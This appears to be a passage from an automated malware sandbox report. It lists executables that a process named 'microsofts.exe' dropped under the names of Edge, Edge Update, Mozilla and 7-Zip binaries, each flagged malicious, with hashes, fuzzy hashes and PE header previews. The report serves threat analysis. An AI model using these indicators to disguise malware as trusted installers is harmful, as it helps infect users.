                                                                                                                                                                                                                                                                                                          SHA-256:434A041A3E1C611F6C85DC2F74B4B2BC102BBA77E7F57E796DE66809B4D09703
                                                                                                                                                                                                                                                                                                          SHA-512:1F578424574C4AA10E91224B6084F6DA9E9C7DC883E573EA24E9543F8B303BDB7EE6DF3F606B8E676F8D281F1D805E9BE002128431774C8FD0FBED8754215110
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......l...2......@..........@..............................-......Q,... .................................................h.........!.. ...P ........................8......................(...P...@...............x............................text....k.......l.................. ..`.rdata...............p..............@..@.data...T....p.......^..............@....pdata.......P ......d..............@..@.00cfg..0.... !......* .............@..@.gxfg...P1...0!..2..., .............@..@.retplne.....p!......^ ..................tls..........!......` .............@...LZMADEC.......!......b ............. ..`_RDATA..\.....!......t .............@..@malloc_h......!......v ............. ..`.rsrc.... ....!.."...x .............@..@.reloc........$.......".............@...................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):4320256
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.824612930643131
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:sTaRe7mkn5KLvD5qGVC0080pb4tgLUgGEsLABD5wTQh07yrLMLl9YPhVDmg27RnN:PI72LvkrDpbxJRoIM+D527BWG
                                                                                                                                                                                                                                                                                                          MD5:EE375F04CA24A1D04C46C4B095F4BB8F
                                                                                                                                                                                                                                                                                                          SHA1:C569AC9B46C2A352D51A344D397B65EA29B805DD
                                                                                                                                                                                                                                                                                                          SHA-256:4FD5027E8A6359106558BC79BAE08F255C7DC1898EACCCABBBFBDDD764DBBB47
                                                                                                                                                                                                                                                                                                          SHA-512:05BF5E8F5AF14F41A580378153317E97EF16138701316BA85B2AF710FF9813EC9ACB0A2396C03186464F8BB370547A6D098EC7384BD23F1BE3A13A2AD562C9DD
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................C.....veB... ..........................................'3......+3.P.....8.x....P6..e..................h.2.T.....................2.(...P"-.@............43.......3. ....................text...E.,.......,................. ..`.rdata..4#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc...x.....8.......6.............@..@.reloc... ...p:.......8.............@...........................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2062336
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.097236278801967
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:3W9Jml9mmijviMnF+ZxmQWcbLw8V6sqjnhMgeiCl7G0nehbGZpbD:3Wnm5iOMkjmQWkVODmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:F25CF65CAF46E3969B327B77609C907E
                                                                                                                                                                                                                                                                                                          SHA1:CA376038118B103B2B12204D587911B7FC762EF6
                                                                                                                                                                                                                                                                                                          SHA-256:ED95F8EAAB522C377041D1549DFB5EC47A42FC7B97F087340F0972D7261038EF
                                                                                                                                                                                                                                                                                                          SHA-512:30E6F34D3BAC1990CB21E9EDF01F893567215D0FFF1A6F0F2D512A439DB6A5C234864E7059C3FBF46F29B621EEA5D5C7BDBF73836E8924714DAD91415E172513
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......h...4......P..........@.............................. ........... .................................................Z...................H......................8.......................(...`...@...........(...@............................text....g.......h.................. ..`.rdata...).......*...l..............@..@.data...............................@....pdata..H...........................@..@.00cfg..0....P.......H..............@..@.gxfg...p-...`.......J..............@..@.retplne.............x...................tls.................z..............@...CPADinfo8............|..............@..._RDATA..\............~..............@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1801216
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.16634764637907
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:vwNHwoYhua6MtjRO4qbBJTY6mY1uIgssqjnhMgeiCl7G0nehbGZpbD:vwNPdQO7BJTfmEnDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:D560F31B3F8FED536ED9D53E6E4FC319
                                                                                                                                                                                                                                                                                                          SHA1:ED04434D59AA696E7E43FF4B7A753259EF746EFF
                                                                                                                                                                                                                                                                                                          SHA-256:428B2DF6B9EC511AE1FCE89541C36E7075BFA8E00478129B936E7FC19E45A276
                                                                                                                                                                                                                                                                                                          SHA-512:134BC4C6E7F0196B728A6124F15F0C4142A46793ABEE0D14797DBBB99E63593B6F6B5EA143861F7E063818BA89FB89B75A76876ACA65AAE8C4E296F03E5FF98E
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@....................................q..... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1847808
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.1454698197766975
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:riD2VmA1YXwHwlklb8boUuWPg2gVsqjnhMgeiCl7G0nehbGZpbD:GD2VmAyiwIb8boQuDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:AB291A741F47E27775C47CF805720C5D
                                                                                                                                                                                                                                                                                                          SHA1:8059C7253749E268C2C4EE7223DEA79D4D042F65
                                                                                                                                                                                                                                                                                                          SHA-256:ADC95CFD2C98E4214FD3645FA924BFBFB45A05C822AF399EAB51192715189BD6
                                                                                                                                                                                                                                                                                                          SHA-512:D25436AA86273449261E302B1AED794A5D70ADBAF517A52EE1CA9BC8C79940DAFBA219816069CBAE281C3E05FB07967F422F2E6B4B68F5E3F94502D14CAC8467
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..................p.........@.............................p.......<.... .........................................2...........d....`..8....P..........................8......................(.......@...............X...(........................text...4........................... ..`.rdata..|...........................@..@.data................r..............@....pdata.......P.......n..............@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne..... ...........................tls.........0.......0..............@..._RDATA..\....@.......2..............@..@malloc_h.....P.......4.............. ..`.rsrc...8....`.......6..............@..@.reloc.......p.......B..............@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1801216
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.166362544488334
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:WwNHwoYhua6MtjRO4qbBJTY6mY1uIgssqjnhMgeiCl7G0nehbGZpbD:WwNPdQO7BJTfmEnDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:FDF7D8F9FEA566707E69A739603FE6CB
                                                                                                                                                                                                                                                                                                          SHA1:A5E40D0C02CAAF6AFB3DA31C1BB752A821512DA3
                                                                                                                                                                                                                                                                                                          SHA-256:0217435470F9F0B9F62978427BED480B0504A0B7959D28011B4FCD2D8996A597
                                                                                                                                                                                                                                                                                                          SHA-512:CA4583CAE8E08CD15F426F90BF8FC2AA939A2291FED877EBDEBF8F75BEB0D4E7663E5E9C79BA749EE9410E839A0CC970CF2E3EB819C02497B5849AE72F92F896
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......*...r......P..........@.......................................... .........................................C...........................T.......................T.......................(....R..@............"..8.......`....................text....(.......*.................. ..`.rdata.......@......................@..@.data...@...........................@....pdata..T...........................@..@.00cfg..0....@.......N..............@..@.gxfg....,...P...,...P..............@..@.retplne.............|...................tls.................~..............@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc...............................@..@.reloc..............................@...........................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1325568
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.141851019985087
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:j4lbht6BH/sqjnhMgeiCl7G0nehbGZpbD:ElNtqHjDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:F962054709806711163D11A7B5E254F0
                                                                                                                                                                                                                                                                                                          SHA1:230C44D1C63F590C000AAA782CCCBDEBB73D440A
                                                                                                                                                                                                                                                                                                          SHA-256:DD8867BEFD878FB45CA4AD6BF1516CA46F18C8AA1609812C1D1C4B217DE9F273
                                                                                                                                                                                                                                                                                                          SHA-512:7C9B07C0BFBB272C918A2DDE43E6AAF3D7424CD491D1F0FC95F4FA8699D8276E5127C32B165924B816B498A0FFE5304A9BAC8B3351AD10F083F75058F84B41C9
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o.y.+c..+c..+c..?...!c..?....c..?...9c..I...:c..I...8c..I....c..?...*c..?....c..+c..Xc......)c.....*c..+c..|c......*c..Rich+c..........................PE..L...B(.d.................^..........@........p....@.................................o`......................................H...<........q..........................pu..p...........................X...@...............@....k..`....................text...`\.......^.................. ..`.data........p.......b..............@....idata...............l..............@..@.didat...............v..............@....rsrc....q.......r...x..............@..@.reloc...`...0...P..................@...........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1221120
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.138852923387598
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:gIkOkTB+wjXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:gIxkTBVjsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:25BCF757F471B196A97D63CE9BD8DF3D
                                                                                                                                                                                                                                                                                                          SHA1:BC46811AEE7A50FFE96BEE94840DFBB675640F47
                                                                                                                                                                                                                                                                                                          SHA-256:8032D6B0A5A0EBC923539BC401B6F14B5F120AACDA4CC81ACFD6F09C6A5FFE47
                                                                                                                                                                                                                                                                                                          SHA-512:358DFE045039300A90AD601A0AE46414AC1593F14CD05532083431C1201F2448EF8269AF69AE67276E1349409B9AB6BD9300C958508BA8426AA3C30CD4B35D46
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...8(.d..........................................@.................................n.......................................x...(....`..X3..............................p...............................@.......................@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1335296
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.236772350787977
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:44lssmroCEXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:4cssmrmsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:C43F5DBE6EEB54B201DADC1606FF4D49
                                                                                                                                                                                                                                                                                                          SHA1:82ABDA73D6E90F7DE69A630F58A6EA56676ED051
                                                                                                                                                                                                                                                                                                          SHA-256:A45088AD652D9D1514C22805ECE6CE1573EB169D35BF804BC75DEB7ABC2D048D
                                                                                                                                                                                                                                                                                                          SHA-512:2E86528D85E156D903AA5537988BD770EB101AFC3D7747E45BFEB4487D8B1F5E295AD2B7C844ADC9FB415C1D0B0CA8A5AF8C8E914D37A3B100BDFBE35E098EBF
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............O.@.O.@.O.@.$.A.O.@.$.A|O.@.7.A.O.@.7.A.O.@.7.A.O.@W6.A.O.@.$.A.O.@.$.A.O.@.$.A.O.@.O.@IN.@W6.A.O.@W6.@.O.@W6.A.O.@Rich.O.@........PE..d...@(.d.........."......n...........].........@.......................................... .....................................................(............@..........................p.......................(...p,..@...............0............................text....l.......n.................. ..`.rdata..8z.......|...r..............@..@.data...P3..........................@....pdata.......@......................@..@.didat.......`......................@..._RDATA.......p......................@..@.rsrc...............................@..@.reloc...P.......@... ..............@...........................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1383936
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.338515999042273
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:M03cT++foSBWU2YxhkghsqjnhMgeiCl7G0nehbGZpbD:z3cK+foQWU2YnP1Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:06F6A2E6C033F0F21544AABD541C7932
                                                                                                                                                                                                                                                                                                          SHA1:4026D5C703F47E1BF012FB0805CE027943928FC2
                                                                                                                                                                                                                                                                                                          SHA-256:7F8EBA756D4B29A71BBA0B471A22F4DFB75EFBBB754A0EA309939AB5407FEE12
                                                                                                                                                                                                                                                                                                          SHA-512:5B7B49CCF34CC9219BEBEB01FA3E47B6BDD43E1944081C146DE5F71FB8506F7FE3BABACFE2BAA199153732B2E53FF49637360AD5F2285E0BB3D0495DFA8E1366
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............wU..wU..wU.tT..wU.rTg.wU..sT..wU..tT..wU..rT..wU.sT..wU.qT..wU.vT..wU..vUQ.wUK.~T..wUK..U..wUK.uT..wURich..wU........PE..L...B(.d............................p.............@..................................h.......................................y..........H3...........................g..p....................g..........@....................x.......................text............................... ..`.rdata...z.......|..................@..@.data....'...........z..............@....didat..$...........................@....rsrc...H3.......4..................@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1221120
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.138903608870187
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:AbrNRzB+NBXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:AbBRzBgBsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:3C6E1AAC1F4FD2D770AECF7E4CDEB762
                                                                                                                                                                                                                                                                                                          SHA1:30AA11E72788ADFE824C7DF5114ABA45D14FF4F1
                                                                                                                                                                                                                                                                                                          SHA-256:337572D34B42004D1573F1D3E0EF4CC44E47CB630F88E5455AC675F980F81337
                                                                                                                                                                                                                                                                                                          SHA-512:9D849E32FC885B609A70A56EBC1414B90EC582F7FD1C271F57F1FEABED63FFD6ABEC0066FB98C4B3996E8AE2AAC79F16D7E18E19395E684579FA76AF2435DEDD
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,.B...B...B...A...B...G...B...F...B...G...B...F...B...A...B...C...B...C..B...G...B......B......B...@...B.Rich..B.........................PE..L...7(.d..........................................@.................................1...........................................(....`..X3..............................p...............................@...................<...@....................text............................... ..`.rdata...`.......b..................@..@.data........0......................@....didat.......P......................@....rsrc...X3...`...4..................@..@.reloc...`.......P...R..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2168832
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9405585532876115
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:Ry53w24gQu3TPZ2psFkiSqwozPDmg27RnWGj:RyFQgZqsFki+ozPD527BWG
                                                                                                                                                                                                                                                                                                          MD5:EE6A56397AD5B0A6268AEC6254684661
                                                                                                                                                                                                                                                                                                          SHA1:061AA33E822172992288A3189D92761F3E79B37E
                                                                                                                                                                                                                                                                                                          SHA-256:D6868A1EB9C78C6F71B0DFE929658CD486547540528A38AAF1D07D1FF9C06E16
                                                                                                                                                                                                                                                                                                          SHA-512:A72090FEB4980C830A9C51C365DCC17C496D9110CAA612055498248328B40032CE1088DB68BB5B7F3CFEEC37BAD46036E8545B2A7EBD62B2C965B078B6699DC9
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d..[ e.. e.. e..4...+e..4....e..B...1e..B...4e......-e..B....e..4...3e..4...!e..4...-e.. e...e....@.!e.. e(.ve......!e..Rich e..................PE..L....(.d............................ }............@..........................p!.......!......................................?..x....................................1..p....................1..........@...............H...T>..`....................text...*........................... ..`.rdata..............................@..@.data...,....P.......8..............@....didat..,....p.......B..............@....rsrc................D..............@..@.reloc.......p.......(..............@...................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):3141
                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.803308829924924
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:48:KCVnAJrzKnRUgQ/gmny6nknEKgBEI1+gkgJGMEgqwCGzKzERNgn46gD:WCr7Ymg
                                                                                                                                                                                                                                                                                                          MD5:7B46F50682B48D2CE6B62F301E4772B5
                                                                                                                                                                                                                                                                                                          SHA1:8E90A920A18BCA496739FA89600D86BC1C99AED7
                                                                                                                                                                                                                                                                                                          SHA-256:875F8D8AE1D3C5EAEBC3BD74D05A97A990AB573ABEF857BB4A1761CBCF1BF53D
                                                                                                                                                                                                                                                                                                          SHA-512:94474B6997123B14F472198147072711099D344D9C3FC30BCE7CD501E8FB3960CD5A29FA96E537578859A5A8F5F03F007599B8225EF4EF92118214A6F0FE0E81
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeAuditPrivilege...2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeBackupPrivilege...2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-10-10 04:07:34-0400: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeDebugPrivilege...2024-10-10 04:07:34-0400: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-10-10 04:07:34-0400: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-10-10 04:07:3

                                                                                                                                                                                                                                                                                                          C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1356800
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3478268186599065
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:eQVTZu0JqsqjnhMgeiCl7G0nehbGZpbD:FVTZuLDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:F20BF005553AB1557724E26FBFDB22C5
                                                                                                                                                                                                                                                                                                          SHA1:998624B191810621E2DC9E261F480A5A742B6690
                                                                                                                                                                                                                                                                                                          SHA-256:B65D19716D64C4E5DCD9B4A35F036E4ADB0169BFD579D01A7FA405CA3CD26DD5
                                                                                                                                                                                                                                                                                                          SHA-512:38579CB90638BF84249FE67DBF721E9D6F1CFE552D81E1FDCB03B0FE04750F6EDDD9CC285E6E2206CB222CD4CA641B488A1193456C9940CEAB1F5FFC36513AB2
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P.......^.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\7-Zip\7z.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1683968
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.623113736888856
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:i+gkESfh4CoZsqjnhMgeiCl7G0nehbGZpbD:ngkE+SPDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:D77B1D9F972D861A54BCCA414035C1BF
                                                                                                                                                                                                                                                                                                          SHA1:F043114C651956FDC125BF4CD381944D8278366C
                                                                                                                                                                                                                                                                                                          SHA-256:985014C888AEC6454BB6511348E6D083FD11F4964A8DF46A0CC4A63C06437714
                                                                                                                                                                                                                                                                                                          SHA-512:2439D5D09EFCFE035F89ED92D0BEE9B0F80E01D9A565C1A820CF15DB2891E6F959E55E4442DF5C72D8526CD26A669A41D22721625CC336D734104F910ADB469C
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............xaX.xaX.xaX...X.xaX...X.xaX.x`XlxaX...X.xaX..eY.xaX...X.xaX`.bY.xaX...X.xaX...X.xaXRich.xaX........................PE..d....\.d.........."...........................@.............................. ............ .....................................................x............@...q......................................................................0............................text...v........................... ..`.rdata..T...........................@..@.data....-..........................@....pdata...q...@...r..................@..@.rsrc................j..............@..@.reloc...P.......@...r..............@...........................................................................................................................................................................................................................................................

